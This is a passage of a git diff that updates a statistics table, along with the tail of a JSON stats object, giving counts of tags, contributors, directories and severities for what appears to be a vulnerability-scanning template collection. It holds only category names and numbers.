airane","count":1},{"name":"ilovebinbash","count":1},{"name":"deena","count":1},{"name":"elmahdi","count":1},{"name":"hakluke","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"schniggie","count":1},{"name":"whynotke","count":1},{"name":"jteles","count":1},{"name":"absshax","count":1},{"name":"ldionmarcil","count":1},{"name":"qlkwej","count":1},{"name":"micha3lb3n","count":1},{"name":"j33n1k4","count":1},{"name":"0xtavian","count":1},{"name":"rodnt","count":1},{"name":"thezakman","count":1},{"name":"_darrenmartyn","count":1},{"name":"yashanand155","count":1},{"name":"gboddin","count":1},{"name":"luskabol","count":1},{"name":"fopina","count":1},{"name":"idealphase","count":1},{"name":"andirrahmani1","count":1},{"name":"soyelmago","count":1},{"name":"abison_binoy","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"regala_","count":1},{"name":"makyotox","count":1},{"name":"manuelbua","count":1},{"name":"pdp","count":1},{"name":"retr0","count":1},{"name":"andysvints","count":1},{"name":"its0x08","count":1},{"name":"_c0wb0y_","count":1},{"name":"juicypotato1","count":1},{"name":"r3naissance","count":1},{"name":"naglinagli","count":1},{"name":"yavolo","count":1},{"name":"sy3omda","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"noamrathaus","count":1},{"name":"vsh00t","count":1},{"name":"hanlaomo","count":1},{"name":"raesene","count":1},{"name":"becivells","count":1},{"name":"rojanrijal","count":1},{"name":"omarkurt","count":1},{"name":"taielab","count":1},{"name":"chron0x","count":1},{"name":"thevillagehacker","count":1},{"name":"tirtha_mandal","count":1},{"name":"luci","count":1},{"name":"exploitation","count":1},{"name":"smaranchand","count":1},{"name":"un-fmunozs","count":1},{"name":"ringo","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"0h1in9e","count":1},{"name":"gal nagli","count":1},{"name":"akshansh","count":1},{"name":"mohammedsaneem","count":1},{"name":"b4uh0lz","count":1},{"name":"ooooooo_q","count":1},{"name":"sshell","count":1},{"name":"rtcms","count":1},{"name":"_harleo","count":1},{"name":"zandros0","count":1},{"name":"alex","count":1},{"name":"c3l3si4n","count":1},{"name":"dogasantos","count":1},{"name":"shelld3v","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"divya_mudgal","count":1},{"name":"defr0ggy","count":1},{"name":"kabirsuda","count":1},{"name":"zhenwarx","count":1},{"name":"petruknisme","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"mubassirpatel","count":1},{"name":"kurohost","count":1},{"name":"tim_koopmans","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"shifacyclewla","count":1},{"name":"mhdsamx","count":1},{"name":"jeya seelan","count":1},{"name":"shreyapohekar","count":1},{"name":"aresx","count":1},{"name":"furkansenan","count":1},{"name":"co0nan","count":1},{"name":"alperenkesk","count":1},{"name":"undefl0w","count":1},{"name":"akash.c","count":1},{"name":"bernardofsr","count":1},{"name":"knassar702","count":1},{"name":"dawid czarnecki","count":1},{"name":"arcc","count":1},{"name":"berkdusunur","count":1},{"name":"wabafet","count":1},{"name":"@dwisiswant0","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"geraldino2","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"ahmed sherif","count":1},{"name":"streetofhackerr007","count":1},{"name":"sicksec","count":1},{"name":"sickwell","count":1},{"name":"yashgoti","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"bjhulst","count":1},{"name":"remonsec","count":1},{"name":"alph4byt3","count":1},{"name":"0xteles","count":1},{"name":"ajaysenr","count":1},{"name":"ohlinge","count":1},{"name":"sullo","count":1},{"name":"bad5ect0r","count":1},{"name":"52971","count":1},{"name":"kareemse1im","count":1},{"name":"notsoevilweasel","count":1},{"name":"th3.d1p4k","count":1},{"name":"philippdelteil","count":1},{"name":"johnjhacking","count":1},{"name":"0ut0fb4nd","count":1},{"name":"iampritam","count":1},{"name":"patralos","count":1},{"name":"vzamanillo","count":1},{"name":"willd96","count":1},{"name":"ipanda","count":1},{"name":"blckraven","count":1},{"name":"johnk3r","count":1},{"name":"affix","count":1},{"name":"fmunozs","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"nytr0gen","count":1},{"name":"huowuzhao","count":1},{"name":"apt-mirror","count":1},{"name":"me9187","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"mah3sec_","count":1}],"directory":[{"name":"cves","count":540},{"name":"vulnerabilities","count":249},{"name":"exposed-panels","count":215},{"name":"exposures","count":170},{"name":"technologies","count":151},{"name":"misconfiguration","count":119},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":43},{"name":"workflows","count":34},{"name":"miscellaneous","count":27},{"name":"network","count":27},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":563},{"name":"high","count":436},{"name":"medium","count":363},{"name":"critical","count":206},{"name":"low","count":150}],"types":[{"name":"http","count":1624},{"name":"file","count":43},{"name":"network","count":35},{"name":"dns","count":11}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index f99c983619..7c93e4b0de 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,643 +1,676 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | -| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | -| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | -| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | -| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | -| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | -| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | -| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | -| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | -| config | 90 | gaurang | 42 | workflows | 34 | | | | | -| cve2021 | 83 | pussycat0x | 34 | miscellaneous | 27 | | | | | -| cve2019 | 82 | ice3man | 26 | network | 27 | | | | | -| tech | 78 | organiccrap | 24 | iot | 22 | | | | | -| takeover | 72 | 0x_akoko | 20 | fuzzing | 10 | | | | | -| cve2018 | 66 | sheikhrishad | 15 | dns | 10 | | | | | -| | 66 | milo2012 | 14 | cnvd | 9 | | | | | -| token | 63 | philippedelteil | 14 | headless | 5 | | | | | +| cve | 533 | dhiyaneshdk | 232 | cves | 540 | info | 563 | http | 1624 | +| panel | 213 | pikpikcu | 219 | vulnerabilities | 249 | high | 436 | file | 43 | +| xss | 194 | pdteam | 189 | exposed-panels | 215 | medium | 363 | network | 35 | +| wordpress | 184 | dwisiswant0 | 126 | exposures | 170 | critical | 206 | dns | 11 | +| exposure | 178 | geeknik | 121 | technologies | 151 | low | 150 | | | +| rce | 177 | daffainfo | 108 | misconfiguration | 119 | | | | | +| lfi | 152 | madrobot | 60 | takeovers | 70 | | | | | +| cve2020 | 151 | princechaddha | 53 | default-logins | 49 | | | | | +| wp-plugin | 123 | gy741 | 50 | file | 43 | | | | | +| tech | 93 | gaurang | 42 | workflows | 34 | | | | | +| config | 90 | pussycat0x | 36 | network | 27 | | | | | +| cve2021 | 84 | ice3man | 26 | miscellaneous | 27 | | | | | +| cve2019 | 84 | organiccrap | 24 | iot | 23 | | | | | +| takeover | 72 | 0x_akoko | 20 | dns | 11 | | | | | +| cve2018 | 67 | philippedelteil | 15 | fuzzing | 10 | | | | | +| | 66 | sheikhrishad | 15 | cnvd | 9 | | | | | +| token | 64 | milo2012 | 14 | headless | 5 | | | | | | apache | 61 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | | default-login | 50 | techbrunchfr | 13 | | | | | | | -| iot | 43 | suman_kar | 12 | | | | | | | -| cve2017 | 43 | cyllective | 11 | | | | | | | -| file | 42 | random_robbie | 10 | | | | | | | -| unauth | 40 | righettod | 9 | | | | | | | -| network | 35 | wdahlenb | 9 | | | | | | | -| sqli | 34 | hackergautam | 8 | | | | | | | -| oob | 32 | nadino | 8 | | | | | | | +| cve2017 | 45 | suman_kar | 12 | | | | | | | +| iot | 44 | cyllective | 11 | | | | | | | +| file | 43 | random_robbie | 10 | | | | | | | +| unauth | 42 | wdahlenb | 9 | | | | | | | +| network | 35 | righettod | 9 | | | | | | | +| oob | 34 | nadino | 8 | | | | | | | +| sqli | 34 | melbadry9 | 8 | | | | | | | | logs | 29 | aashiq | 8 | | | | | | | -| oracle | 29 | iamthefrogy | 8 | | | | | | | -| workflow | 29 | melbadry9 | 8 | | | | | | | -| ssrf | 27 | that_juan_ | 8 | | | | | | | -| misc | 27 | randomstr1ng | 7 | | | | | | | -| jira | 26 | dr_set | 7 | | | | | | | -| atlassian | 26 | emadshanab | 7 | | | | | | | -| disclosure | 25 | 0x240x23elu | 7 | | | | | | | -| cve2016 | 23 | oppsec | 7 | | | | | | | -| listing | 22 | harshbothra_ | 7 | | | | | | | -| redirect | 20 | techryptic (@tech) | 7 | | | | | | | -| aem | 19 | kophjager007 | 7 | | | | | | | -| cisco | 17 | r3dg33k | 7 | | | | | | | -| sap | 16 | puzzlepeaches | 6 | | | | | | | -| debug | 14 | caspergn | 6 | | | | | | | -| misconfig | 13 | __fazal | 6 | | | | | | | -| struts | 13 | yanyun | 5 | | | | | | | -| fuzz | 13 | joanbono | 5 | | | | | | | -| cve2015 | 13 | panch0r3d | 5 | | | | | | | -| adobe | 12 | ganofins | 5 | | | | | | | -| auth-bypass | 12 | pentest_swissky | 5 | | | | | | | +| oracle | 29 | hackergautam | 8 | | | | | | | +| workflow | 29 | that_juan_ | 8 | | | | | | | +| misc | 27 | iamthefrogy | 8 | | | | | | | +| ssrf | 27 | r3dg33k | 7 | | | | | | | +| jira | 26 | oppsec | 7 | | | | | | | +| atlassian | 26 | dr_set | 7 | | | | | | | +| disclosure | 25 | techryptic (@tech) | 7 | | | | | | | +| cve2016 | 24 | 0x240x23elu | 7 | | | | | | | +| listing | 23 | emadshanab | 7 | | | | | | | +| redirect | 21 | randomstr1ng | 7 | | | | | | | +| aem | 19 | harshbothra_ | 7 | | | | | | | +| cisco | 18 | kophjager007 | 7 | | | | | | | +| sap | 16 | __fazal | 6 | | | | | | | +| cve2015 | 16 | caspergn | 6 | | | | | | | +| debug | 14 | puzzlepeaches | 6 | | | | | | | +| android | 13 | yanyun | 5 | | | | | | | +| misconfig | 13 | panch0r3d | 5 | | | | | | | +| cve2012 | 13 | ganofins | 5 | | | | | | | +| fuzz | 13 | pentest_swissky | 5 | | | | | | | +| struts | 13 | joanbono | 5 | | | | | | | | weblogic | 12 | meme-lord | 4 | | | | | | | -| android | 12 | iamnoooob | 4 | | | | | | | -| dns | 11 | xelkomy | 4 | | | | | | | -| cve2012 | 11 | nodauf | 4 | | | | | | | -| zoho | 11 | elsfa7110 | 4 | | | | | | | -| springboot | 11 | github.com/its0x08 | 4 | | | | | | | -| cve2011 | 11 | rootxharsh | 4 | | | | | | | -| cve2014 | 10 | e_schultze_ | 4 | | | | | | | -| devops | 10 | impramodsargar | 3 | | | | | | | -| jenkins | 10 | z3bd | 3 | | | | | | | -| cve2013 | 10 | mavericknerd | 3 | | | | | | | -| php | 10 | binaryfigments | 3 | | | | | | | -| dlink | 10 | tess | 3 | | | | | | | -| magento | 9 | dudez | 3 | | | | | | | -| gitlab | 8 | shine | 3 | | | | | | | -| ftp | 8 | yash anand @yashanand155 | 3 | | | | | | | -| rails | 8 | fyoorer | 3 | | | | | | | -| aws | 8 | f1tz | 3 | | | | | | | -| airflow | 8 | thomas_from_offensity | 3 | | | | | | | -| cnvd | 8 | _generic_human_ | 3 | | | | | | | -| router | 8 | jarijaas | 3 | | | | | | | -| joomla | 7 | 0w4ys | 3 | | | | | | | -| nginx | 7 | ree4pwn | 2 | | | | | | | -| scada | 7 | joeldeleep | 2 | | | | | | | -| xxe | 7 | 0xsapra | 2 | | | | | | | -| vmware | 7 | incogbyte | 2 | | | | | | | -| coldfusion | 6 | x1m_martijn | 2 | | | | | | | -| jetty | 6 | vavkamil | 2 | | | | | | | -| rconfig | 6 | dheerajmadhukar | 2 | | | | | | | -| google | 6 | amsda | 2 | | | | | | | -| backup | 6 | fabaff | 2 | | | | | | | -| citrix | 6 | 0xrudra | 2 | | | | | | | -| api | 6 | 0xcrypto | 2 | | | | | | | -| cms | 6 | hetroublemakr | 2 | | | | | | | -| lucee | 5 | koti2 | 2 | | | | | | | -| java | 5 | 0xelkomy | 2 | | | | | | | -| dedecms | 5 | davidmckennirey | 2 | | | | | | | -| ruijie | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| drupal | 5 | bp0lr | 2 | | | | | | | -| django | 5 | udit_thakkur | 2 | | | | | | | -| dell | 5 | nkxxkn | 2 | | | | | | | -| circarlife | 5 | bing0o | 2 | | | | | | | -| ibm | 5 | bsysop | 2 | | | | | | | -| ssti | 5 | ehsahil | 2 | | | | | | | -| confluence | 5 | gevakun | 2 | | | | | | | -| cve2009 | 5 | lotusdll | 2 | | | | | | | -| netgear | 5 | lu4nx | 2 | | | | | | | -| login | 5 | random-robbie | 2 | | | | | | | -| headless | 5 | randomrobbie | 2 | | | | | | | -| laravel | 5 | manas_harsh | 2 | | | | | | | -| solr | 5 | moritz nentwig | 2 | | | | | | | +| auth-bypass | 12 | xelkomy | 4 | | | | | | | +| dns | 12 | nodauf | 4 | | | | | | | +| adobe | 12 | rootxharsh | 4 | | | | | | | +| cve2014 | 12 | iamnoooob | 4 | | | | | | | +| zoho | 11 | github.com/its0x08 | 4 | | | | | | | +| cve2011 | 11 | elsfa7110 | 4 | | | | | | | +| springboot | 11 | e_schultze_ | 4 | | | | | | | +| jenkins | 11 | jarijaas | 3 | | | | | | | +| cve2013 | 10 | 0w4ys | 3 | | | | | | | +| php | 10 | shine | 3 | | | | | | | +| dlink | 10 | dudez | 3 | | | | | | | +| devops | 10 | yash anand @yashanand155 | 3 | | | | | | | +| magento | 9 | thomas_from_offensity | 3 | | | | | | | +| router | 9 | f1tz | 3 | | | | | | | +| airflow | 8 | fyoorer | 3 | | | | | | | +| aws | 8 | binaryfigments | 3 | | | | | | | +| rails | 8 | impramodsargar | 3 | | | | | | | +| gitlab | 8 | _generic_human_ | 3 | | | | | | | +| ftp | 8 | tess | 3 | | | | | | | +| cnvd | 8 | z3bd | 3 | | | | | | | +| xxe | 7 | mavericknerd | 3 | | | | | | | +| cve2009 | 7 | x1m_martijn | 2 | | | | | | | +| nginx | 7 | shifacyclewala | 2 | | | | | | | +| login | 7 | udit_thakkur | 2 | | | | | | | +| joomla | 7 | swissky | 2 | | | | | | | +| vmware | 7 | kiblyn11 | 2 | | | | | | | +| scada | 7 | alifathi-h1 | 2 | | | | | | | +| backup | 6 | manas_harsh | 2 | | | | | | | +| rconfig | 6 | bp0lr | 2 | | | | | | | +| coldfusion | 6 | zomsop82 | 2 | | | | | | | +| dell | 6 | 0xsapra | 2 | | | | | | | +| cms | 6 | joeldeleep | 2 | | | | | | | +| api | 6 | bsysop | 2 | | | | | | | +| google | 6 | random-robbie | 2 | | | | | | | +| citrix | 6 | ehsahil | 2 | | | | | | | +| jetty | 6 | 0xprial | 2 | | | | | | | +| fileupload | 5 | moritz nentwig | 2 | | | | | | | +| drupal | 5 | bing0o | 2 | | | | | | | +| netgear | 5 | ree4pwn | 2 | | | | | | | +| phpmyadmin | 5 | pxmme1337 | 2 | | | | | | | +| lucee | 5 | vavkamil | 2 | | | | | | | +| solr | 5 | davidmckennirey | 2 | | | | | | | +| ruijie | 5 | 0xrudra | 2 | | | | | | | +| ssti | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| files | 5 | foulenzer | 2 | | | | | | | | iis | 5 | unstabl3 | 2 | | | | | | | -| phpmyadmin | 5 | afaq | 2 | | | | | | | -| files | 5 | pxmme1337 | 2 | | | | | | | -| thinkphp | 4 | 0xprial | 2 | | | | | | | -| hongdian | 4 | emenalf | 2 | | | | | | | -| solarwinds | 4 | zomsop82 | 2 | | | | | | | -| magmi | 4 | shifacyclewala | 2 | | | | | | | +| headless | 5 | lu4nx | 2 | | | | | | | +| java | 5 | afaq | 2 | | | | | | | +| ibm | 5 | amsda | 2 | | | | | | | +| circarlife | 5 | hetroublemakr | 2 | | | | | | | +| confluence | 5 | fabaff | 2 | | | | | | | +| django | 5 | nkxxkn | 2 | | | | | | | +| dedecms | 5 | hahwul | 2 | | | | | | | +| laravel | 5 | koti2 | 2 | | | | | | | +| asp | 4 | incogbyte | 2 | | | | | | | +| jolokia | 4 | 0xelkomy | 2 | | | | | | | +| artifactory | 4 | randomrobbie | 2 | | | | | | | +| thinkphp | 4 | emenalf | 2 | | | | | | | +| moodle | 4 | gevakun | 2 | | | | | | | +| magmi | 4 | lotusdll | 2 | | | | | | | | tomcat | 4 | w4cky_ | 2 | | | | | | | -| samsung | 4 | foulenzer | 2 | | | | | | | -| jolokia | 4 | swissky | 2 | | | | | | | -| webserver | 4 | kiblyn11 | 2 | | | | | | | -| elastic | 4 | thevillagehacker | 1 | | | | | | | -| traversal | 4 | bernardo rodrigues | 1 | | | | | | | +| thinkcmf | 4 | dheerajmadhukar | 2 | | | | | | | +| webserver | 4 | 0xcrypto | 2 | | | | | | | +| vpn | 4 | absshax | 1 | | | | | | | +| docker | 4 | patralos | 1 | | | | | | | +| deserialization | 4 | jeya seelan | 1 | | | | | | | +| elastic | 4 | wabafet | 1 | | | | | | | +| crlf | 4 | andysvints | 1 | | | | | | | +| solarwinds | 4 | sullo | 1 | | | | | | | +| samsung | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| traversal | 4 | undefl0w | 1 | | | | | | | +| nodejs | 4 | petruknisme | 1 | | | | | | | +| hongdian | 4 | philippdelteil | 1 | | | | | | | +| r-seenet | 3 | _darrenmartyn | 1 | | | | | | | +| fanruan | 3 | yashanand155 | 1 | | | | | | | +| ebs | 3 | micha3lb3n | 1 | | | | | | | +| log | 3 | willd96 | 1 | | | | | | | +| lfr | 3 | _harleo | 1 | | | | | | | +| fpd | 3 | sushant kamble | 1 | | | | | | | +| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | +| cve2010 | 3 | fopina | 1 | | | | | | | +| mongodb | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| ofbiz | 3 | ldionmarcil | 1 | | | | | | | +| openssh | 3 | daviey | 1 | | | | | | | +| bypass | 3 | shreyapohekar | 1 | | | | | | | +| caucho | 3 | manuelbua | 1 | | | | | | | +| hp | 3 | j33n1k4 | 1 | | | | | | | +| oa | 3 | flag007 | 1 | | | | | | | +| amazon | 3 | sicksec | 1 | | | | | | | +| nosqli | 3 | nytr0gen | 1 | | | | | | | +| nacos | 3 | 52971 | 1 | | | | | | | +| kubernetes | 3 | rojanrijal | 1 | | | | | | | +| kafka | 3 | rtcms | 1 | | | | | | | +| ssh | 3 | cookiehanhoan | 1 | | | | | | | +| itop | 3 | revblock | 1 | | | | | | | +| git | 3 | un-fmunozs | 1 | | | | | | | +| zabbix | 3 | luskabol | 1 | | | | | | | +| vbulletin | 3 | aceseven (digisec360) | 1 | | | | | | | +| resin | 3 | makyotox | 1 | | | | | | | +| printer | 3 | d0rkerdevil | 1 | | | | | | | +| bitrix | 3 | akash.c | 1 | | | | | | | +| springcloud | 3 | notsoevilweasel | 1 | | | | | | | +| slack | 3 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| windows | 3 | furkansenan | 1 | | | | | | | +| targa | 3 | rodnt | 1 | | | | | | | +| terramaster | 3 | kabirsuda | 1 | | | | | | | +| backups | 3 | sshell | 1 | | | | | | | +| grafana | 3 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| microstrategy | 3 | @github.com/defr0ggy | 1 | | | | | | | +| service | 2 | abison_binoy | 1 | | | | | | | +| rockmongo | 2 | sy3omda | 1 | | | | | | | +| keycloak | 2 | bolli95 | 1 | | | | | | | +| yapi | 2 | shelld3v | 1 | | | | | | | +| httpd | 2 | c3l3si4n | 1 | | | | | | | +| injection | 2 | r3naissance | 1 | | | | | | | +| jellyfin | 2 | bjhulst | 1 | | | | | | | +| showdoc | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| smtp | 2 | smaranchand | 1 | | | | | | | +| status | 2 | b4uh0lz | 1 | | | | | | | +| nextjs | 2 | blckraven | 1 | | | | | | | +| intrusive | 2 | 0xtavian | 1 | | | | | | | +| idrac | 2 | yavolo | 1 | | | | | | | +| oauth | 2 | luci | 1 | | | | | | | +| leak | 2 | whynotke | 1 | | | | | | | +| igs | 2 | co0nan | 1 | | | | | | | +| linkerd | 2 | mohammedsaneem | 1 | | | | | | | +| webcam | 2 | johnk3r | 1 | | | | | | | +| phpcollab | 2 | 0xteles | 1 | | | | | | | +| splunk | 2 | exploitation | 1 | | | | | | | +| strapi | 2 | thevillagehacker | 1 | | | | | | | +| pega | 2 | ilovebinbash | 1 | | | | | | | +| shellshock | 2 | streetofhackerr007 | 1 | | | | | | | +| spark | 2 | becivells | 1 | | | | | | | +| fortios | 2 | naglinagli | 1 | | | | | | | +| vrealize | 2 | idealphase | 1 | | | | | | | +| sonarqube | 2 | arcc | 1 | | | | | | | +| hashicorp | 2 | b0yd | 1 | | | | | | | +| xxljob | 2 | mah3sec_ | 1 | | | | | | | +| kibana | 2 | zhenwarx | 1 | | | | | | | +| telerik | 2 | deena | 1 | | | | | | | +| kevinlab | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| ecology | 2 | juicypotato1 | 1 | | | | | | | +| frp | 2 | remonsec | 1 | | | | | | | +| dos | 2 | gboddin | 1 | | | | | | | +| couchdb | 2 | vsh00t | 1 | | | | | | | +| smb | 2 | s1r1u5_ | 1 | | | | | | | +| prometheus | 2 | ringo | 1 | | | | | | | +| natshell | 2 | iampritam | 1 | | | | | | | +| mida | 2 | dawid czarnecki | 1 | | | | | | | +| glassfish | 2 | aresx | 1 | | | | | | | +| nexus | 2 | its0x08 | 1 | | | | | | | +| wordfence | 2 | jteles | 1 | | | | | | | +| ucmdb | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| vpn | 4 | sshell | 1 | | | | | | | -| artifactory | 4 | gal nagli | 1 | | | | | | | -| fileupload | 4 | mubassirpatel | 1 | | | | | | | -| nodejs | 4 | furkansenan | 1 | | | | | | | -| moodle | 4 | un-fmunozs | 1 | | | | | | | -| crlf | 4 | thezakman | 1 | | | | | | | -| asp | 4 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| docker | 4 | j33n1k4 | 1 | | | | | | | -| thinkcmf | 4 | kareemse1im | 1 | | | | | | | -| grafana | 3 | divya_mudgal | 1 | | | | | | | -| springcloud | 3 | 0xrod | 1 | | | | | | | -| slack | 3 | naglinagli | 1 | | | | | | | -| microstrategy | 3 | @dwisiswant0 | 1 | | | | | | | -| nacos | 3 | _darrenmartyn | 1 | | | | | | | -| ofbiz | 3 | johnjhacking | 1 | | | | | | | -| windows | 3 | bad5ect0r | 1 | | | | | | | -| nosqli | 3 | regala_ | 1 | | | | | | | -| backups | 3 | geraldino2 | 1 | | | | | | | -| fpd | 3 | smaranchand | 1 | | | | | | | -| kubernetes | 3 | wabafet | 1 | | | | | | | -| hp | 3 | gboddin | 1 | | | | | | | -| ebs | 3 | makyotox | 1 | | | | | | | -| targa | 3 | chron0x | 1 | | | | | | | -| ssh | 3 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| vbulletin | 3 | akash.c | 1 | | | | | | | -| oa | 3 | fmunozs | 1 | | | | | | | -| r-seenet | 3 | daviey | 1 | | | | | | | -| amazon | 3 | blckraven | 1 | | | | | | | -| resin | 3 | alex | 1 | | | | | | | -| caucho | 3 | knassar702 | 1 | | | | | | | -| cve2010 | 3 | remonsec | 1 | | | | | | | -| mongodb | 3 | noamrathaus | 1 | | | | | | | -| fanruan | 3 | soyelmago | 1 | | | | | | | -| deserialization | 3 | shreyapohekar | 1 | | | | | | | -| log | 3 | ohlinge | 1 | | | | | | | -| git | 3 | cookiehanhoan | 1 | | | | | | | -| openssh | 3 | retr0 | 1 | | | | | | | -| terramaster | 3 | 0xtavian | 1 | | | | | | | -| bypass | 3 | bolli95 | 1 | | | | | | | -| kafka | 3 | ldionmarcil | 1 | | | | | | | -| lfr | 3 | fopina | 1 | | | | | | | -| printer | 3 | jeya seelan | 1 | | | | | | | -| frp | 2 | nytr0gen | 1 | | | | | | | -| jboss | 2 | rtcms | 1 | | | | | | | -| ucmdb | 2 | elmahdi | 1 | | | | | | | -| webcam | 2 | defr0ggy | 1 | | | | | | | -| plesk | 2 | c3l3si4n | 1 | | | | | | | -| microsoft | 2 | vsh00t | 1 | | | | | | | -| proxy | 2 | exploitation | 1 | | | | | | | -| trixbox | 2 | andysvints | 1 | | | | | | | -| paloalto | 2 | 52971 | 1 | | | | | | | -| xxljob | 2 | mah3sec_ | 1 | | | | | | | -| keycloak | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| smb | 2 | sickwell | 1 | | | | | | | -| linkerd | 2 | dawid czarnecki | 1 | | | | | | | -| natshell | 2 | affix | 1 | | | | | | | -| jellyfin | 2 | yashanand155 | 1 | | | | | | | -| globalprotect | 2 | mhdsamx | 1 | | | | | | | -| httpd | 2 | whynotke | 1 | | | | | | | -| hjtcloud | 2 | bjhulst | 1 | | | | | | | -| sonarqube | 2 | d0rkerdevil | 1 | | | | | | | -| cache | 2 | raesene | 1 | | | | | | | -| showdoc | 2 | undefl0w | 1 | | | | | | | -| vrealize | 2 | sushant kamble | 1 | | | | | | | -| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| dos | 2 | ipanda | 1 | | | | | | | -| kibana | 2 | co0nan | 1 | | | | | | | -| mida | 2 | patralos | 1 | | | | | | | -| oauth | 2 | sicksec | 1 | | | | | | | -| fortios | 2 | hakluke | 1 | | | | | | | -| rstudio | 2 | luci | 1 | | | | | | | -| strapi | 2 | ahmed sherif | 1 | | | | | | | -| cve2008 | 2 | streetofhackerr007 | 1 | | | | | | | -| shellshock | 2 | rojanrijal | 1 | | | | | | | -| openfire | 2 | 0ut0fb4nd | 1 | | | | | | | -| intrusive | 2 | alph4byt3 | 1 | | | | | | | -| kentico | 2 | b0yd | 1 | | | | | | | -| emerge | 2 | hanlaomo | 1 | | | | | | | -| kevinlab | 2 | revblock | 1 | | | | | | | -| hpe | 2 | sullo | 1 | | | | | | | -| mail | 2 | andirrahmani1 | 1 | | | | | | | -| ecology | 2 | sy3omda | 1 | | | | | | | -| yapi | 2 | kabirsuda | 1 | | | | | | | -| idrac | 2 | alifathi-h1 | 1 | | | | | | | -| splunk | 2 | idealphase | 1 | | | | | | | -| cve2007 | 2 | kba@sogeti_esec | 1 | | | | | | | -| rockmongo | 2 | deena | 1 | | | | | | | -| openam | 2 | taielab | 1 | | | | | | | -| zhiyuan | 2 | alperenkesk | 1 | | | | | | | -| seeyon | 2 | micha3lb3n | 1 | | | | | | | -| wordfence | 2 | shelld3v | 1 | | | | | | | -| smtp | 2 | becivells | 1 | | | | | | | -| odoo | 2 | s1r1u5_ | 1 | | | | | | | -| service | 2 | toufik airane | 1 | | | | | | | -| waf | 2 | luskabol | 1 | | | | | | | -| nagios | 2 | arcc | 1 | | | | | | | -| rockethchat | 2 | schniggie | 1 | | | | | | | -| zabbix | 2 | th3.d1p4k | 1 | | | | | | | -| chiyu | 2 | 0xteles | 1 | | | | | | | -| couchdb | 2 | _harleo | 1 | | | | | | | -| prometheus | 2 | pdp | 1 | | | | | | | -| injection | 2 | kurohost | 1 | | | | | | | -| telerik | 2 | notsoevilweasel | 1 | | | | | | | -| chamilo | 2 | ringo | 1 | | | | | | | -| nexus | 2 | pudsec | 1 | | | | | | | -| bigip | 2 | omarkurt | 1 | | | | | | | -| huawei | 2 | flag007 | 1 | | | | | | | -| glassfish | 2 | dogasantos | 1 | | | | | | | -| leak | 2 | vzamanillo | 1 | | | | | | | -| voipmonitor | 2 | yavolo | 1 | | | | | | | -| bitrix | 2 | @github.com/defr0ggy | 1 | | | | | | | -| pega | 2 | juicypotato1 | 1 | | | | | | | -| igs | 2 | ilovebinbash | 1 | | | | | | | -| maian | 2 | iampritam | 1 | | | | | | | -| spark | 2 | abison_binoy | 1 | | | | | | | -| hashicorp | 2 | 0h1in9e | 1 | | | | | | | -| saltstack | 2 | apt-mirror | 1 | | | | | | | -| icewarp | 2 | yashgoti | 1 | | | | | | | -| activemq | 2 | willd96 | 1 | | | | | | | -| sonicwall | 2 | absshax | 1 | | | | | | | -| sharepoint | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| flir | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| nextjs | 2 | tirtha_mandal | 1 | | | | | | | -| redcap | 1 | _c0wb0y_ | 1 | | | | | | | -| mantis | 1 | r3naissance | 1 | | | | | | | -| npm | 1 | aceseven (digisec360) | 1 | | | | | | | -| anchorcms | 1 | j3ssie/geraldino2 | 1 | | | | | | | -| k8s | 1 | bernardofsr | 1 | | | | | | | -| shopxo | 1 | johnk3r | 1 | | | | | | 